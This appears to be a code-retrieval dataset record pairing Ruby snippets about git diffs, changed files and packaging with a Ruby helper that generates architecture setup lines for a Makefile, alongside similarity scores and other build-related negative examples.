"def build_appdynamics\n old_filepath = \"source/appdynamics-php-agent-linux_x64-#{@source_input.version}.tar.bz2\"\n filename_prefix = \"#{@filename_prefix}_linux_noarch_any-stack\"\n\n if File.exist?(old_filepath)\n merge_out_data(old_filepath, filename_prefix)\n else\n HTTPHelper.download(@source_input, old_filepath)\n @out_data[:sha256] = Sha.get_digest(old_filepath, \"sha256\")\n @out_data[:url] = @source_input.url\n end\n end",
"def diff_url\n return unless last_deployment\n return if deployment.sha == last_deployment.sha\n \"https://github.com/#{deployment.repository}/compare/#{last_deployment.sha[0..5]}...#{deployment.sha[0..5]}\"\n end",
"def test_ruby_unix_like_date_past_same_year\n Timecop.freeze(Time.utc(2009, 1, 1)) do\n assert_equal Time.utc(2009, 1, 1), Net::FTP::List.parse(@dir.raw).mtime\n end\n Timecop.freeze(Time.utc(2008, 4, 1)) do\n assert_equal Time.utc(2008, 3, 11, 7, 57), Net::FTP::List.parse(@other_dir.raw).mtime\n end\n end",
"def new_version?\n package_branch.new_version?(self.unit)\n end",
"def diff2; end",
"def file_staged?(path)\n command = 'git diff --cached --name-only'\n output = command_stdout(command)\n prefix = repo_root\n output.each_line do |line|\n line.strip!\n return true if path == \"#{prefix}/#{line}\"\n end\n false\n end",
"def top_dsl_file_changed?(repo_diffs_summary)\n top_dsl_file_changed = false\n TOP_DSL_FILE_REGEXPS.each do | top_dsl_file_regexp |\n top_dsl_file_changed = true if repo_diffs_summary.prune!(top_dsl_file_regexp)\n end\n top_dsl_file_changed\n end",
"def files_changed_in_patch(patchfile, tap)\n files = []\n formulae = []\n others = []\n File.foreach(patchfile) do |line|\n files << Regexp.last_match(1) if line =~ %r{^\\+\\+\\+ b/(.*)}\n end\n files.each do |file|\n if tap&.formula_file?(file)\n formula_name = File.basename(file, \".rb\")\n formulae << formula_name unless formulae.include?(formula_name)\n else\n others << file\n end\n end\n { files: files, formulae: formulae, others: others }\n end",
"def files_changed_in_patch(patchfile, tap)\n files = []\n formulae = []\n others = []\n File.foreach(patchfile) do |line|\n files << Regexp.last_match(1) if line =~ %r{^\\+\\+\\+ b/(.*)}\n end\n files.each do |file|\n if tap&.formula_file?(file)\n formula_name = File.basename(file, \".rb\")\n formulae << formula_name unless formulae.include?(formula_name)\n else\n others << file\n end\n end\n { files: files, formulae: formulae, others: others }\n end",
"def check_changed_files(git)\n git.status.select {|file| file.type || file.untracked }\n end",
"def native(from,to)\n command = \"cd #{@repodir} ; git diff --name-status #{from} #{to}\"\n puts \"Checking difference : \\n#{command}\"\n result = `#{command}`\n exitcode = $?\n exit -1 unless exitcode == 0\n return result.split(/\\n/)\n end",
"def changed_files(parent_sha, change_sha, node)\n response = shell_out!(\n \"git diff --name-only #{parent_sha} #{change_sha}\",\n :cwd => node['delivery']['workspace']['repo']\n ).stdout.strip\n\n changed_files = []\n response.each_line do |line|\n changed_files << line.strip\n end\n changed_files\n end",
"def file_changes?\n all_files = git.modified_files + git.added_files\n Danger::Changelog::Config.ignore_files.each do |f|\n all_files.reject! { |modified_file| f.is_a?(Regexp) ? f.match?(modified_file) : f == modified_file }\n break if all_files.empty?\n end\n all_files.any?\n end",
"def mirror_file(source, dest, copied = [], duplicated = [], postfix = '_override')\n base, rest = split_name(source)\n dst_dir = File.dirname(dest)\n dup_path = dst_dir / \"#{base}#{postfix}.#{rest}\" \n if File.file?(source)\n mkdir_p(dst_dir) unless File.directory?(dst_dir)\n if File.exists?(dest) && !File.exists?(dup_path) && !FileUtils.identical?(source, dest)\n # copy app-level override to *_override.ext\n copy_entry(dest, dup_path, false, false, true)\n duplicated << dup_path.relative_path_from(Merb.root)\n end\n # copy gem-level original to location\n if !File.exists?(dest) || (File.exists?(dest) && !FileUtils.identical?(source, dest))\n copy_entry(source, dest, false, false, true) \n copied << dest.relative_path_from(Merb.root)\n end\n end\n end",
"def update!\n if path = vendorized?\n type = File.symlink?(path) ? :symlink : :copy\n FileUtils.rm_rf normalize(:lib)\n send \"vendorize_with_#{type}\"\n say \"updated #{type} #{path} -> #{program(:version)}\"\n else\n ['dom.html', 'rhino.js', 'node.js'].each do |path|\n path = normalize path\n next unless File.exists? path\n contents = File.read(path).gsub /jspec-(\\d+\\.\\d+\\.\\d+)/, \"jspec-#{program(:version)}\"\n if program(:version) == $1\n say \"skipping #{path}; already #{$1}\"\n next\n end\n File.open(path, 'r+'){ |file| file.write contents } \n say \"updated #{path}; #{$1} -> #{program(:version)}\"\n end\n end\n end",
"def files_to_diff\n files = {}\n COMPARISON_PATHS.each do |framework_dir, project_dir|\n Dir.new(\"#{get_path_to_rails_gem}#{framework_dir}\").entries.reject { |e| /^\\./.match(e) }.each do |file|\n framework_file = \"#{get_path_to_rails_gem}#{framework_dir}#{file}\"\n project_file = \"#{project_path}#{project_dir}#{file}\" \n files[framework_file] = project_file\n end\n end\n \n COMPARISON_FILES.each do |framework_file, project_file|\n files[\"#{get_path_to_rails_gem}#{framework_file}\"] = \"#{project_path}#{project_file}\"\n end\n \n files\n end",
"def modified_since_last_time(previous_db_image, new_db_image)\n return true if ! previous_db_image\n previous_db_image.sha1sum != new_db_image.sha1sum\n end",
"def createDiffResult(working_dir, channel_cfg, vimapp, isReleaseOperator,backupRoot)\n\n remotedir = readChannelDir(channel_cfg, vimapp) + \"/\"+ File.basename(working_dir)\n puts remotedir.green\n if File.directory?(remotedir) == false\n FileUtils.mkdir_p remotedir\n end\n\n reportFile1 = \"#{remotedir}/report\"\n reportFile2 = \"#{remotedir}/rdetail\"\n lines = File.open(reportFile1, \"r:UTF-8\").each_line.to_a\n\n hashes = Array.new\n lines.each do |line|\n if line.start_with? \"hash=\"\n hashes.push line.gsub(\"hash=\",\"\").strip.chomp\n end\n end\n\n g = gitOpen(working_dir)\n \n logs = getGitLog(g)\n local_branches = getGitBranches(g)[:local]\n diff = compareHashes g, logs, hashes\n \n def getDiffDetails(diffinfo)\n puts \"diffdetails\"\n data = Array.new \n\n diffinfo[:files].each do |file|\n print \"[\"\n print file[0].cyan\n print \"] \"\n print \"[+] #{file[1][:insertions]}\".green\n print \" \"\n print \"[-] #{file[1][:deletions]}\".red\n puts\n # file, insertions, deletions\n data.push \"file=#{file[0]},#{file[1][:insertions]},#{file[1][:deletions]}\"\n end\n\n return data \n end\n\n diff_details = getDiffDetails diff[1]\n \n puts \"\\n\\n|||||||||||||||||||||||||WRITE|||||||||||||||||||||||||||||||||\\n\\n\"\n\n puts \"hash=\"+diff[2]\n puts \"hash=\"+diff[3]\n diff_details.each do |d| \n puts d\n end\n\n diffReportDir = \"#{working_dir}/.diffreport\"\n FileUtils.mkdir_p diffReportDir \n\n #write diff detail to file \n r_detail = \"#{diffReportDir}/detail\"\n\n puts \">> 222\"\n f = File.open(r_detail, \"w:UTF-8\")\n diff[0].each do |l|\n f.puts l\n end\n f.close\n\n f = File.open(r_detail+\".color\", \"w:UTF-8\")\n diff[0].each do |l|\n if isPlus(l)\n f.puts l.green\n elsif isMinus(l)\n f.puts l.red\n else\n f.puts l\n end\n end\n f.close\n\n puts \">> 111\"\n #write diff to file\n diffReport = \"#{diffReportDir}/report\"\n f = File.open(diffReport, \"w:UTF-8\")\n f.puts \"hash=\"+diff[2]\n f.puts \"hash=\"+diff[3]\n diff_details.each do |d| \n f.puts d\n end\n f.close\n puts \"\\n\\nWRITTEN\\n\\n\".green\n\n if isReleaseOperator == false\n FileUtils.cp \"#{diffReport}\", \"#{reportFile1}\"\n FileUtils.cp \"#{r_detail}\", \"#{reportFile2}\"\n else\n metaOK = FileUtils.identical?(diffReport, reportFile1)\n detailOK = FileUtils.identical?(r_detail, reportFile2)\n \n puts \n print \"[ OVERVIEWS ] \" #metaOK.to_s.red\n puts metaOK ? \"IDENTICAL\".green : \"DIFFERENT\".red\n print \"[CODE DETAILS] \"\n puts detailOK ? \"IDENTICAL\".green : \"DIFFERENT\".red\n puts\n def compare(file1, file2)\n puts \">> compare\"\n lines1 = File.open(file1, \"r:UTF-8\").each_line.to_a\n lines2 = File.open(file2, \"r:UTF-8\").each_line.to_a\n def showInclusion(lines1, lines2, i)\n lines1.each do |line|\n if lines2.include?(line) == false\n if i == true\n puts \"[YOURS] \"+ line.chomp.cyan\n else\n puts \"[REMOTE] \"+ line.chomp.yellow\n end\n end\n end\n end\n showInclusion(lines1, lines2, true)\n showInclusion(lines2, lines1, false)\n end\n compare diffReport, reportFile1\n compare r_detail, reportFile2\n end\n\n files = Array.new\n diff_details.each do |d| \n if d.start_with? \"file=\"\n files.push d.gsub(\"file=\",\"\").strip.chomp\n end\n end\n if hashes.size > 0\n #compareBackupsWithOldVersion(g, working_dir, backupRoot, files, hash) \n #compareBackupsWithOldVersion(g, working_dir,backupRoot,files, hash[1]) \n end\n end",
"def print_puppetfile_diff(old, new)\n # Build hashes mapping the module name to the module object. This makes it\n # a little easier to determine which modules have been added, removed, or\n # modified.\n old = (old&.modules || []).each_with_object({}) do |mod, acc|\n next unless mod.type == :forge\n acc[mod.full_name] = mod\n end\n\n new = new.modules.each_with_object({}) do |mod, acc|\n next unless mod.type == :forge\n acc[mod.full_name] = mod\n end\n\n # New modules are those present in new but not in old.\n added = new.reject { |full_name, _mod| old.include?(full_name) }.values\n\n if added.any?\n diff = \"Adding the following modules:\\n\"\n added.each { |mod| diff += \"#{mod.full_name} #{mod.version}\\n\" }\n @outputter.print_action_step(diff)\n end\n\n # Upgraded modules are those that have a newer version in new than old.\n upgraded = new.select do |full_name, mod|\n if old.include?(full_name)\n mod.version > old[full_name].version\n end\n end.keys\n\n if upgraded.any?\n diff = \"Upgrading the following modules:\\n\"\n upgraded.each { |full_name| diff += \"#{full_name} #{old[full_name].version} to #{new[full_name].version}\\n\" }\n @outputter.print_action_step(diff)\n end\n\n # Downgraded modules are those that have an older version in new than old.\n downgraded = new.select do |full_name, mod|\n if old.include?(full_name)\n mod.version < old[full_name].version\n end\n end.keys\n\n if downgraded.any?\n diff = \"Downgrading the following modules: \\n\"\n downgraded.each { |full_name| diff += \"#{full_name} #{old[full_name].version} to #{new[full_name].version}\\n\" }\n @outputter.print_action_step(diff)\n end\n\n # Removed modules are those present in old but not in new.\n removed = old.reject { |full_name, _mod| new.include?(full_name) }.values\n\n if removed.any?\n diff = \"Removing the following modules:\\n\"\n removed.each { |mod| diff += \"#{mod.full_name} #{mod.version}\\n\" }\n @outputter.print_action_step(diff)\n end\n end",
"def diff1; end",
"def test_pull_a_new_file_into_a_modified_tree\n b.add(\"dir/three\" => \"three content\").commit(\"b added three\")\n a.add(\"dir/two\" => \"two content\").commit(\"a added two\")\n \n assert_equal \"two content\", a['dir/two']\n assert_equal nil, b['dir/two']\n assert_equal \"three content\", b['dir/three']\n \n b.pull\n \n assert_equal \"two content\", a['dir/two']\n assert_equal \"two content\", b['dir/two']\n assert_equal \"three content\", b['dir/three']\n \n assert_log_equal [\n \"a added one\",\n \"a added two\",\n \"b added three\", \n \"gitgo merge of origin/gitgo into gitgo\"\n ], b\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/RYLabs/rails-devcontainer-template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-devcontainer-template/(.+)/rails-postgres.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def changelog_has_been_modified\n\n modified = git.modified_files.include?(\"CHANGELOG.md\")\n return modified\n\nend",
"def git_changes?\n Dir.chdir(@dir) do\n git = Process.spawn('git', 'diff-index', '--cached', '--quiet', 'HEAD')\n Process.wait(git)\n raise \"git diff-index failed weirdly: #{$?.exitstatus}\" if $?.exitstatus > 1\n $?.exitstatus == 1\n end\n end",
"def test_ut_diff_source_code_02\n assert_equal(1,@diff_source_code_1.diff_result_id)\n assert_equal(1,@diff_source_code_1.original_file_id)\n assert_equal(1,@diff_source_code_1.diff_file_id)\n assert_equal(nil,@diff_source_code_1.added_lines)\n assert_equal(\"7;8;9;25;390;396;397;400;404\",@diff_source_code_1.deleted_lines)\n assert_equal(\"1,1;2,2;3,3;4,4;6,6;10,10;11,11;12,12;13,13;14,14;15,15;\",@diff_source_code_1.common_lines)\n end"
] | [
"0.69058627",
"0.6773206",
"0.6525139",
"0.6017702",
"0.5980599",
"0.5980599",
"0.5971509",
"0.5917137",
"0.5833289",
"0.57902545",
"0.5734645",
"0.56653184",
"0.5664062",
"0.56551045",
"0.56526834",
"0.5645943",
"0.5645111",
"0.5638795",
"0.56369454",
"0.56161374",
"0.5613723",
"0.5611553",
"0.5586492",
"0.5585269",
"0.5567075",
"0.5540067",
"0.55274576",
"0.55086786",
"0.5506268",
"0.55007255",
"0.5486256",
"0.5480861",
"0.5478233",
"0.5472016",
"0.54628575",
"0.5461845",
"0.5460725",
"0.54535836",
"0.5446455",
"0.54318297",
"0.54026127",
"0.5389423",
"0.5387959",
"0.5386508",
"0.53742987",
"0.536955",
"0.5367678",
"0.5366792",
"0.536116",
"0.5353928",
"0.53395265",
"0.5290706",
"0.5289717",
"0.5273777",
"0.5262564",
"0.5260469",
"0.52578866",
"0.5252856",
"0.52329236",
"0.5229954",
"0.5229886",
"0.52225345",
"0.52215725",
"0.5211788",
"0.5209848",
"0.5199204",
"0.51968867",
"0.51758355",
"0.5165089",
"0.51626843",
"0.5153701",
"0.51501536",
"0.5148427",
"0.51446366",
"0.5144582",
"0.51255316",
"0.51200885",
"0.51192874",
"0.5113915",
"0.5107907",
"0.5106633",
"0.5105453",
"0.510286",
"0.510286",
"0.5100825",
"0.5092435",
"0.5091264",
"0.50806165",
"0.5080047",
"0.5075123",
"0.50651354",
"0.50560635",
"0.50493526",
"0.5048045",
"0.5042054",
"0.5041597",
"0.5039692",
"0.50360817",
"0.50340873",
"0.50339746"
] | 0.6427643 | 3 |
Compute the ruby arch setup; for passing through sed, escaping is required; for use with file rendering, no escaping is required | def ruby_arch_setup(do_escape = false)
Packager.info "Creating ruby env setup"
if do_escape
setup = Regexp.escape("arch=$(shell gcc -print-multiarch)\n")
# Extract the default ruby version to build for on that platform
# this assumes a proper setup of /usr/bin/ruby
setup += Regexp.escape("ruby_ver=$(shell ruby -r rbconfig -e ") + "\\\"print RbConfig::CONFIG[\'ruby_version\']\\\")" + Regexp.escape("\n")
setup += Regexp.escape("ruby_arch_dir=$(shell ruby -r rbconfig -e ") + "\\\"print RbConfig::CONFIG[\'archdir\']\\\")" + Regexp.escape("\n")
setup += Regexp.escape("ruby_libdir=$(shell ruby -r rbconfig -e ") + "\\\"print RbConfig::CONFIG[\'rubylibdir\']\\\")" + Regexp.escape("\n")
setup += Regexp.escape("rockruby_archdir=$(subst /usr,,$(ruby_arch_dir))\n")
setup += Regexp.escape("rockruby_libdir=$(subst /usr,,$(ruby_libdir))\n")
else
setup = "arch=$(shell gcc -print-multiarch)\n"
# Extract the default ruby version to build for on that platform
# this assumes a proper setup of /usr/bin/ruby
setup += "ruby_ver=$(shell ruby -r rbconfig -e \"print RbConfig::CONFIG[\'ruby_version\']\")\n"
setup += "ruby_arch_dir=$(shell ruby -r rbconfig -e \"print RbConfig::CONFIG[\'archdir\']\")\n"
setup += "ruby_libdir=$(shell ruby -r rbconfig -e \"print RbConfig::CONFIG[\'rubylibdir\']\")\n"
setup += "rockruby_archdir=$(subst /usr,,$(ruby_arch_dir))\n"
setup += "rockruby_libdir=$(subst /usr,,$(ruby_libdir))\n"
end
Packager.info "Ruby env setup is:\n#{setup}"
setup
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def shell_ruby_platform\n `ruby -rrbconfig -e \"puts RbConfig::CONFIG['sitearchdir']\"`\n end",
"def archs_for_command cmd\n cmd = cmd.to_s # If we were passed a Pathname, turn it into a string.\n cmd = `/usr/bin/which #{cmd}` unless Pathname.new(cmd).absolute?\n cmd.gsub! ' ', '\\\\ ' # Escape spaces in the filename.\n\n archs = IO.popen(\"/usr/bin/file #{cmd}\").readlines.inject([]) do |archs, line|\n case line\n when /Mach-O (executable|dynamically linked shared library) ppc/\n archs << :ppc7400\n when /Mach-O 64-bit (executable|dynamically linked shared library) ppc64/\n archs << :ppc64\n when /Mach-O (executable|dynamically linked shared library) i386/\n archs << :i386\n when /Mach-O 64-bit (executable|dynamically linked shared library) x86_64/\n archs << :x86_64\n else\n archs\n end\n end\n archs.extend(ArchitectureListExtension)\nend",
"def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end",
"def GetArchOfELF(filename)\n bash_out = Convert.to_map(\n SCR.Execute(\n path(\".target.bash_output\"),\n Ops.add(Ops.add(Directory.ybindir, \"/elf-arch \"), filename)\n )\n )\n return \"unknown\" if Ops.get_integer(bash_out, \"exit\", 1) != 0\n Builtins.deletechars(Ops.get_string(bash_out, \"stdout\", \"unknown\"), \"\\n\")\n end",
"def get_archs(lib_path)\n cmd('lipo', '-info', lib_path).split(':').last.strip.split(/\\s/)\nend",
"def ruby_arch\n case Common.target_platform\n when /darwin/\n 'x86_64-darwin10'\n when 'linux-x86_64'\n 'x86_64-linux'\n when 'linux-x86'\n 'i686-linux'\n when /windows/\n 'x64-mingw64'\n end\nend",
"def canonical_arch\n Config::CONFIG['arch'].sub(/[\\.0-9]*$/, '')\n end",
"def determine_system_architecture\n @info[:arch] = @shell.query('UNAME', 'uname -m')\n @info[:arch].gsub!(/i\\d86/, 'i386')\n end",
"def _ARCH; Config._ARCH; end",
"def get_arch\n if defined?(@arch) then return @arch else @arch = nil end\n search = File.join(@path, '{*/system32,{i386,amd64}}/ntdll.dll')\n ntdlls = Dir.glob(search, File::FNM_CASEFOLD)\n if ntdlls.length > 0\n machine = %x{pev -c #{ntdlls.first} | grep -i Machine}\n if $?.success?\n @arch = '64-bit' if machine =~ /0x8664/\n @arch = '32-bit' if machine =~ /14c/\n end\n else\n search = File.join(@path, 'sources/{setup.exe,winsetup.dll}')\n setup = Dir.glob(search, File::FNM_CASEFOLD)\n setup.each do |file|\n machine = %x{pev -c #{file} | grep -i Machine}\n if $?.success?\n @arch = '64-bit' if machine =~ /0x8664/\n @arch = '32-bit' if machine =~ /14c/\n break\n end\n end # end of setup block\n begin\n get_xmlinfo if not defined?(@xmlinfo)\n arches = REXML::XPath.match(@xmlinfo, '/WIM/IMAGE/WINDOWS/ARCH/text()')\n arch = arches.first\n if arches.count(arch) == arches.size\n arch = Integer(arch.to_s)\n @arch = '64-bit' if arch == 9\n @arch = '32-bit' if arch == 0\n else\n @arch = '32/64-bit' unless @arch\n end\n rescue Exception => e\n # puts \"error(get_arch): #{e}\"\n end\n end\n @arch\n end",
"def arch_for_filename(path)\n file = File.basename(path, File.extname(path))\n\n case file\n when /686/, /386/\n '32-bit'\n when /86_64/, /amd64/\n '64-bit'\n else\n parts = file.split('_')\n\n if parts.empty?\n raise \"Could not determine arch for filename `#{file}'!\"\n end\n\n parts.last.capitalize\n end\n end",
"def initialize(str = nil, existing = nil)\n\n @system_ruby = false\n self.env_output = {}\n str = get_alias(str)\n\n case str\n when 'system'\n @system_ruby = true\n return\n\n when '', nil\n if existing\n # find version from existing rubies\n @interpreter, @version, @patchlevel, @gemset =\n parse_ruby_string(get_existing_ruby(config_db(\"interpreter\")))\n else\n @interpreter = config_db(\"interpreter\")\n @version = config_db(interpreter, \"version\")\n @patchlevel = config_db(interpreter, version, \"patchlevel\")\n end\n\n else\n @interpreter, @version, @patchlevel, @gemset = parse_ruby_string(str)\n\n if interpreter.nil? && version\n case version\n when /^1\\.(8\\.[6-7]|9\\.[1-3])$/\n @interpreter = \"ruby\"\n when /^1\\.[3-6].*$/\n @interpreter = \"jruby\"\n when /^1\\.[0-2]\\.\\d$/\n @interpreter = \"rbx\"\n when /^\\d*$/\n @interpreter = \"maglev\"\n when /^0\\.8|nightly$/\n @interpreter = \"macruby\"\n end\n elsif interpreter.nil? && version.nil?\n log(\"Ruby string not understood: #{str}\", \"debug\")\n end\n\n if !interpreters.include?(interpreter)\n log(\"Invalid ruby interpreter: #{interpreter}\", \"debug\")\n end\n\n if existing\n i, v, p, g = parse_ruby_string(get_existing_ruby(str))\n @version ||= v\n @patchlevel ||= p\n else\n @version ||= config_db(interpreter, \"version\")\n @patchlevel ||= config_db(interpreter, version, \"patchlevel\")\n end\n end\n\n # TODO use existing to pick suitable ruby if specified\n\n @ruby_string = \"#{interpreter}\"\n @ruby_string += \"-#{version}\" if version\n if patchlevel\n if interpreter == \"ruby\"\n @patchlevel.delete!('p')\n @ruby_string += \"-p#{patchlevel}\"\n else\n @ruby_string += \"-#{patchlevel}\"\n end\n end\n\n @ruby_home = File.join(env.path, \"rubies\", ruby_string)\n @gem_base = File.join(env.gems_path, ruby_string)\n if gemset\n @gem_home = \"#{gem_base}#{env.gemset_separator}#{gemset}\"\n else\n @gem_home = gem_base\n end\n @global_gem_home = \"#{gem_base}#{env.gemset_separator}global\"\n @gem_path = \"#{gem_home}:#{global_gem_home}\"\n\n # TODO why aren't some interpreters in config/known?\n if !known?\n log(\"Unknown ruby specification: #{str} -> #{ruby_string}. Proceeding...\", \"debug\")\n end\n if !valid?\n reset\n @ruby_string = str\n log(\"Invalid ruby specificiation: #{str}\", \"debug\")\n return\n elsif existing && !installed?\n reset\n @ruby_string = str\n log(\"No installed ruby with specificiation: #{str}\", \"debug\")\n return\n end\n end",
"def esc_seq!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 7 )\n\n \n # - - - - main rule block - - - -\n # at line 295:5: ( '\\\\\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\\\\\"' | '\\\\'' | '\\\\\\\\' | 'e' ) | UNICODE_ESC | OCTAL_ESC )\n alt_2 = 3\n look_2_0 = @input.peek( 1 )\n\n if ( look_2_0 == 0x5c )\n case look_2 = @input.peek( 2 )\n when 0x22, 0x27, 0x5c, 0x62, 0x65, 0x66, 0x6e, 0x72, 0x74 then alt_2 = 1\n when 0x75 then alt_2 = 2\n when 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37 then alt_2 = 3\n else\n raise NoViableAlternative( \"\", 2, 1 )\n end\n else\n raise NoViableAlternative( \"\", 2, 0 )\n end\n case alt_2\n when 1\n # at line 295:9: '\\\\\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\\\\\"' | '\\\\'' | '\\\\\\\\' | 'e' )\n match( 0x5c )\n if @input.peek(1) == 0x22 || @input.peek(1) == 0x27 || @input.peek(1) == 0x5c || @input.peek(1) == 0x62 || @input.peek( 1 ).between?( 0x65, 0x66 ) || @input.peek(1) == 0x6e || @input.peek(1) == 0x72 || @input.peek(1) == 0x74\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n when 2\n # at line 296:9: UNICODE_ESC\n unicode_esc!\n\n when 3\n # at line 297:9: OCTAL_ESC\n octal_esc!\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 7 )\n\n end",
"def preprocess\n lineno = 0\n shouldWrite = false\n inFunction = false\n printer = File.open(RB_FILE,'w')\n scanner = File.open(TEX_FILE,'r')\n if printer && scanner\n printer.puts RB_REQUIRE\n scanner.each_line do |line|\n lineno = lineno + 1\n if (line.include? TEX_ENV_01_E) && !determineTexCommented(line, TEX_ENV_01_E)\n puts \"Encountered #{TEX_ENV_01_E} on line #{lineno}\"\n shouldWrite = false\n end\n if shouldWrite\n stripped = line.strip\n if (stripped.include? TEX_MOD) && !determineRubyCommented(stripped, TEX_MOD) && !inFunction\n printer.print appendLineNumberToTexPrintCall(stripped, lineno)\n elsif (stripped.include? RB_CLASS_CREATE) && !determineRubyCommented(stripped, RB_CLASS_CREATE) && !inFunction\n printer.print appendLineNumberToInitialization(stripped, lineno)\n elsif (stripped.include? RB_METHOD_S) && !determineRubyCommented(stripped, RB_METHOD_S) && !inFunction\n puts \"Processing function definition: found line containing #{stripped}\"\n inFunction = true\n extracted = extractFunctionMeta stripped\n $fcnref.store(extracted[0], extracted[1])\n $defstack.push 1\n if (stripped.include? '(') && (stripped.include? ')')\n puts \"Injection into formatted def as \\( \\)! Boo!\"\n else\n puts \"Injection into formatted def as _,_! This is preferrable.\"\n end\n printer.print appendLineNumberArgToFunctionDefinition stripped\n elsif inFunction\n puts \"Parsing #{stripped} inside function...\"\n printer.print stripped\n if (line.include? TEX_MOD) && !determineRubyCommented(line, \"Tex\")\n printer.print \", #{RBTEX_INSERT_LINE}\"\n end\n RB_KEYWORD_END.each do |kwd|\n if line.include? kwd\n puts \"Encountered '#{kwd}'; pushing onto stack...\"\n $defstack.push 1\n break\n end\n end\n if line.include? 'end'\n puts \"Encountered 'end'; popping off of stack...\"\n $defstack.pop\n end\n inFunction = $defstack.any?\n else\n print \"STRIPPED: #{stripped}\\t\"\n deffed = false\n printer.print stripped\n $fcnref.each do |fcn, args|\n if stripped.include? fcn\n if (line.include? '(') && (line.include? ')')\n\n else\n printer.print (args != 0) ? (\", #{lineno}\") : (\" #{lineno}\")\n break\n end\n end\n end\n end\n printer.puts \"\"\n end\n if (line.include? TEX_ENV_01_S) && !determineTexCommented(line, TEX_ENV_01_S)\n puts \"Encountered #{TEX_ENV_01_S} on line #{lineno}\"\n $rbenvs = $rbenvs + 1\n shouldWrite = true\n end\n end\n end\n printer.close\n scanner.close\n return 0\nend",
"def platform_merge ln\n flds = ln.split(' ')\n return if flds[0].to_i == 0\n # app-version-arch'\n fname = flds[2]\n #parts = fname.split('-')\n #return if parts[length] < 3\n #puts \"fname = #{fname}\"\n case ln\n when /32\\.exe$/\n @platforms['Win32'] = ln\n when /\\.tbz$/\n return # ignore \n when /\\.run$/\n return # short circuit - ignore .runs in 3.2.15+ \n when /osx\\-.*\\.tgz$/\n @platforms['OSX'] = ln\n when /armhf\\.run$/\n @platforms['Linux_Raspberry'] = ln\n when /i686\\.run$/\n @platforms['Linux_i686'] = ln\n when /x86_64\\.run$/ \n @platforms['Linux_x86_64'] = ln\n when /armhf\\.install$/\n @platforms['Linux_Raspberry'] = ln\n when /i686\\.install$/\n @platforms['Linux_i686'] = ln\n when /x86_64\\.install$/ \n @platforms['Linux_x86_64'] = ln\n when /tar\\.gz$/\n tarball = ln\n else\n #puts \"failed match #{ln}\"\n end\n return\n end",
"def firmware_and_environment\n\t\t'#{firmware_revision}' + '--' + '#{environment}'\n\tend",
"def app_spec_and_code\n shell_friendly_spec = {\n spec: @app.spec,\n assets: @app.ordered_assets,\n packages: @app.packages,\n }.to_json.shellescape\n\n shell_friendly_code = { code: @app.code }.to_json.shellescape\n\n cmds = []\n cmds << \"RUN \" + [\"/bin/bash\", \"-c\", \"echo -E #{shell_friendly_spec} > /spec.json\"].to_json\n cmds << \"RUN \" + [\"/bin/bash\", \"-c\", \"echo -E #{shell_friendly_code} | python -c 'import sys,json; print json.load(sys.stdin)[\\\"code\\\"]' > /script.sh\"].to_json\n\n <<~APP_SPEC\n # Write app spec and code to root folder\n #{cmds.join(\"\\n\")}\n APP_SPEC\n end",
"def convert_to_ruby (src)\n rb = \"\"\n # dunno how to deal with only leading declarations of ruby code,\n # so replace it with the other markings\n src.gsub!(/-%>/,\"%>\")\n while\tsrc.index(Embedded_ruby_line) != nil\n src.sub!(Embedded_ruby_line) { |match|\n match[match.index '%'] = \" \"\n \"<% \" + match + \" %>\"\n }\n end\n lines = src.split(Embedded_ruby_flag)\n\n is_ruby_line = false\n lines.each { |line|\n if (line.strip != \"\" and line.strip != nil)\n if is_ruby_line\n if line[0,1] == '='\n # line[0] = \" \"\n # rb += \"puts \" + line.strip\n rb+=\"gr_html_puts \"+line.strip\n else\n rb += line.strip\n end\n else\n rb += \"gr_html( \" + line.inspect + \" )\"\n end\n rb += \"\\n\"\n end\n is_ruby_line = (not is_ruby_line)\n }\n #puts rb\n return rb\n end",
"def arch\n x86_64? ? \"amd64\" : \"i386\"\n end",
"def e_sh_js(str)\n (e_sh str).gsub(\"\\\\\", \"\\\\\\\\\\\\\\\\\")\nend",
"def escape(line)\n s = line.sub(/\\s+$/, '').\n gsub(/\\\\/, \"\\\\bs\\?C-q\").\n gsub(/([_\\${}&%#])/, '\\\\\\\\\\1').\n gsub(/\\?C-q/, \"{}\").\n gsub(/\\^/, \"\\\\up{}\").\n gsub(/~/, \"\\\\sd{}\").\n gsub(/\\*/, \"$*$\").\n gsub(/<</, \"<{}<\").\n gsub(/>>/, \">{}>\").\n gsub(/\\[\\]/, \"$[\\\\,]$\").\n gsub(/,,/, \",{},\").\n gsub(/`/, \"\\\\bq{}\")\n s\nend",
"def patches\n system \"cp src/Makefile.in src/Makefile.in.dos\"\n system \"tr -d '\\r' <src/Makefile.in.dos> src/Makefile.in\"\n DATA\n end",
"def rpm_arch\n @lead.arch\n end",
"def assembler_options src,component,system_config\n config=system_config.platform_config(component.platform)\n output=object_file(src,component,system_config)\n opts= config['assembler_options'].split(' ')\n opts<< \"#{config['assembler_out']}#{output}\"\n opts+= prefixed_objects(component.include_paths,config['assembler_include'])\n opts<< src\n end",
